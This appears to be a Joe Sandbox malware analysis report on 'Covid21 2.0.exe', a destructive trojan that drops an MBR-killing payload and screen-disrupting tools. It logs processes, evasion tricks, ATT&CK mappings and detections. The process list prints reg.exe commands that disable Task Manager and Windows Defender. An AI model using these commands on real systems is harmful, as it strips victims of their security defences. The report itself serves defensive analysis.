Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	API coverage: 8.2 %
Source: C:\covid21\Corona.exe	API coverage: 7.1 %
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	API coverage: 4.1 %
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	API coverage: 2.9 %

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00426D20
Source: C:\covid21\Corona.exe	Code function: 12_2_004294BC

Source: C:\Users\user\Desktop\Covid21 2.0.exe TID: 5856	Thread sleep count: 1463 > 30
Source: C:\Users\user\Desktop\Covid21 2.0.exe TID: 5856	Thread sleep time: -36575s >= -30000s
Source: C:\Windows\System32\conhost.exe TID: 5636	Thread sleep count: 108 > 30
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe TID: 204	Thread sleep time: -48000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5644	Thread sleep count: 38 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6252	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe TID: 6492	Thread sleep count: 261 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6524	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe TID: 6736	Thread sleep count: 282 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6784	Thread sleep count: 40 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Thread sleep count: Count: 1463 delay: -25

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_0040850C FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00408604 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: 6_2_00405210 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\covid21\Corona.exe	Code function: 12_2_00404F24 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: 13_2_00404EB8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0043892A _strlen,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,_strcat,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00424873 _strlen,_strcat,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,SetFileAttributesA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00423AD5 DeleteFileA,FindFirstFileA,_strcat,_strrchr,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0040A357 _strrchr,_strcat,_strlen,_strcat,FindFirstFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0042C368 FindFirstFileA,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,MoveFileA,DeleteFileA,MoveFileA,CopyFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00423D09 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00423DE4 FindFirstFileA,FindClose,FileTimeToLocalFileTime,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00424DBB _strlen,_strcat,LocalFileTimeToFileTime,GetSystemTimeAsFileTime,_strcat,_strrchr,_strlen,_strrchr,FindFirstFileA,FindFirstFileA,SetFileTime,GetTickCount,PeekMessageA,GetTickCount,_strlen,_strcat,CreateFileA,SetFileTime,CloseHandle,FindNextFileA,FindClose,_strcat,FindFirstFileA,_strlen,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_0042C603 GetFileAttributesA,FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: 18_2_00439FDC FindFirstFileA,FindClose,GetFileAttributesA,

Source: C:\covid21\Corona.exe

Code function: 12_2_0041DBAC GetSystemInfo,

Source: reg.exe, 00000004.00000002.208267557.0000000002A20000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.210259107.00000000006A0000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.221362521.0000000003750000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: reg.exe, 00000004.00000002.208267557.0000000002A20000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.210259107.00000000006A0000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.221362521.0000000003750000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 00000004.00000002.208267557.0000000002A20000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.210259107.00000000006A0000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.221362521.0000000003750000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: reg.exe, 00000004.00000002.208267557.0000000002A20000.00000002.00000001.sdmp, reg.exe, 00000005.00000002.210259107.00000000006A0000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.221362521.0000000003750000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Found API chain indicative of debugger detection

Show sources

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe	Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Code function: 0_2_00405EB2 GetTempPathA,LoadLibraryA,GetProcAddress,GetLongPathNameA,FreeLibrary,

Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00403B70 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Covid21 2.0.exe	Code function: 0_2_00403CC0 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe	Code function: 23_2_004011B0 Sleep,Sleep,SetUnhandledExceptionFilter,GetStartupInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe	Code function: 23_2_004082CC SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe	Code function: 23_2_00402C51 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe	Code function: 23_2_00402290 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Code function: 28_2_00401179 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Code function: 28_2_0040201C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	Code function: 28_2_00402020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_0040EFDE _strlen,_strcat,_strlen,_strcat,CreateProcessA,CloseHandle,_strcat,ShellExecuteExA,CloseHandle,_strlen,_strlen,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_004132DA keybd_event,VkKeyScanExA,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_0041380D mouse_event,

Source: C:\Users\user\Desktop\Covid21 2.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2870.tmp\Covid21.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe clwcp c:\covid21\covid.jpg
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\x.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K coronaloop.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe inv.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe z.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\mlt.exe mlt.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe icons.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe screenscrew.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2870.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\covid21\Corona.exe c:\covid21\corona.exe

Source: Covid21 2.0.exe, 00000000.00000002.311965350.0000000000611000.00000040.00020000.sdmp, z.exe, z.exe.0.dr	Binary or memory string: Program Manager
Source: Covid21 2.0.exe, z.exe, z.exe.0.dr	Binary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000008.00000002.354896776.0000000003180000.00000002.00000001.sdmp, Corona.exe, 0000000C.00000002.354381919.0000000000D50000.00000002.00000001.sdmp, inv.exe, 0000000D.00000002.354166081.0000000000C80000.00000002.00000001.sdmp, z.exe, 00000012.00000002.354262499.0000000001BA0000.00000002.00000001.sdmp, mlt.exe, 00000017.00000002.354107900.0000000000D90000.00000002.00000001.sdmp, icons.exe, 0000001C.00000002.354241193.0000000001010000.00000002.00000001.sdmp, screenscrew.exe, 00000025.00000002.354181467.0000000000C80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Covid21 2.0.exe, 00000000.00000002.309149345.000000000043D000.00000040.00020000.sdmp, PayloadMBR.exe.0.dr	Binary or memory string: Windows UpdateShell_TrayWnd
Source: Covid21 2.0.exe, 00000000.00000002.311965350.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000000.248581249.000000000045A000.00000002.00020000.sdmp, z.exe.0.dr	Binary or memory string: (preempted: they will resume when the current thread finishes)%s CreateWindoweditShell_TrayWndAutoHotkey2RegClass0x%%%s%s%s.fRequires 1/2/3/Slow/Fast The current thread will exit.msRelativeScreenPress OK to continue.wait
Source: Covid21 2.0.exe, 00000000.00000002.311965350.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000000.248581249.000000000045A000.00000002.00020000.sdmp, z.exe.0.dr	Binary or memory string: ?IsHungAppWindowIsHungThreadThe maximum number of MsgBoxes has been reached.groupclasspididahk_%s%uProgram Manager
Source: wscript.exe, 00000008.00000002.354896776.0000000003180000.00000002.00000001.sdmp, Corona.exe, 0000000C.00000002.354381919.0000000000D50000.00000002.00000001.sdmp, inv.exe, 0000000D.00000002.354166081.0000000000C80000.00000002.00000001.sdmp, z.exe, 00000012.00000002.354262499.0000000001BA0000.00000002.00000001.sdmp, mlt.exe, 00000017.00000002.354107900.0000000000D90000.00000002.00000001.sdmp, icons.exe, 0000001C.00000002.354241193.0000000001010000.00000002.00000001.sdmp, screenscrew.exe, 00000025.00000002.354181467.0000000000C80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	Code function: GetLocaleInfoA,
Source: C:\covid21\Corona.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\covid21\Corona.exe	Code function: GetLocaleInfoA,
Source: C:\covid21\Corona.exe	Code function: GetLocaleInfoA,
Source: C:\covid21\Corona.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\covid21\Corona.exe	Code function: GetLocaleInfoA,
Source: C:\covid21\Corona.exe	Code function: GetLocaleInfoA,
Source: C:\covid21\Corona.exe	Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	Code function: GetLocaleInfoA,GetACP,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	Code function: GetLocaleInfoA,

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe

Code function: 6_2_00409B44 GetLocalTime,

Source: C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe

Code function: 18_2_00419AF0 GetComputerNameA,GetUserNameA,_strcat,_strlen,

Source: C:\Users\user\Desktop\Covid21 2.0.exe

Code function: 0_2_00403CD7 GetVersionExA,GetVersionExA,GetVersionExA,

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Disables the Windows task manager (taskmgr)

Show sources

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Source: z.exe.0.dr	Binary or memory string: WIN_XP
Source: z.exe.0.dr	Binary or memory string: stoppedplay AHK_PlayMeopen "%s" alias AHK_PlayMe%s\All Files (.).Text Documents (.txt).txt%s%c%s%cAll Files (.)%c.%c Select File - %s::{The maximum number of File Dialogs has been reached. The current thread will exit.A Goto/Gosub must not jump into a block that doesn't enclose it.MMMMMMM%02d%03dMSec%dmsSlowSingleLogoff1.0.48.05\AutoHotkey.exeWIN32_WINDOWSWIN32_NTWIN_MEWIN_98WIN_95WIN_NT4WIN_2000WIN_2003WIN_VISTAWIN_XP.DEFAULT\Control Panel\Desktop\ResourceLocaleSYSTEM\CurrentControlSet\Control\Nls\LanguageInstallLanguageSOFTWARE\Microsoft\Windows\CurrentVersionProgramFilesDirAppDataCommon AppDataSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersDesktopCommon DesktopStart MenuCommon Start MenuProgramsCommon ProgramsStartupCommon StartupPersonalUpArrowSizeWESizeNWSESizeNSSizeNESWSizeAllSizeNoIBeamCrossArrowAppStartingUnknownGetCursorInfoColClickDoubleClickNormalGetLastInputInfo
Source: z.exe.0.dr	Binary or memory string: WIN_VISTA

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting112	Application Shimming1	Exploitation for Privilege Escalation1	Disable or Modify Tools1	Input Capture21	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Application Shimming1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Screen Capture1	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Defacement1
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Access Token Manipulation1	Scripting112	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture21	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection12	Obfuscated Files or Information21	NTDS	System Information Discovery26	Distributed Component Object Model	Clipboard Data2	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing21	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Security Software Discovery331	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Modify Registry1	DCSync	Virtualization/Sandbox Evasion13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion13	Proc Filesystem	Process Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	Application Window Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection12	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Covid21 2.0.exe	70%	Virustotal		Browse
Covid21 2.0.exe	30%	Metadefender		Browse
Covid21 2.0.exe	75%	ReversingLabs	Win32.Trojan.DiskWriter
Covid21 2.0.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe	100%	Avira	HEUR/AGEN.1133501
C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	4%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\2870.tmp\CLWCP.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\2870.tmp\Corona.exe	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\2870.tmp\PayloadMBR.exe	82%	ReversingLabs	Win32.Trojan.KillMbr
C:\Users\user\AppData\Local\Temp\2870.tmp\icons.exe	13%	ReversingLabs
C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	6%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\2870.tmp\inv.exe	48%	ReversingLabs	Win32.Downloader.Convagent
C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	36%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\2870.tmp\screenscrew.exe	62%	ReversingLabs	Win32.PUA.BlurScrn
C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\2870.tmp\z.exe	7%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.Covid21 2.0.exe.63145a.3.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.Covid21 2.0.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.Corona.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
13.2.inv.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
6.2.CLWCP.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1131223	Download File
0.2.Covid21 2.0.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.autohotkey.comCould	0%	Avira URL Cloud	safe
http://www.rjlsoftware.com(	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.rjlsoftware.com/?screenscrewopenj	screenscrew.exe, 00000025.00000003.289298313.0000000002090000.00000004.00000001.sdmp	false		high
http://www.rjlsoftware.com/?screenscrew	screenscrew.exe	false		high
http://www.autohotkey.com	z.exe.0.dr	false		high
http://www.autohotkey.comCould	Covid21 2.0.exe, 00000000.00000002.311965350.0000000000611000.00000040.00020000.sdmp, z.exe, 00000012.00000000.248581249.000000000045A000.00000002.00020000.sdmp, z.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.rjlsoftware.com	screenscrew.exe, 00000025.00000002.353059310.000000000043B000.00000004.00020000.sdmp	false		high
http://www.rjlsoftware.com(	screenscrew.exe, 00000025.00000002.354713453.0000000002090000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	377010
Start date:	28.03.2021
Start time:	15:34:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 5s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Covid21 2.0.exe
Cookbook file name:	default.jbs
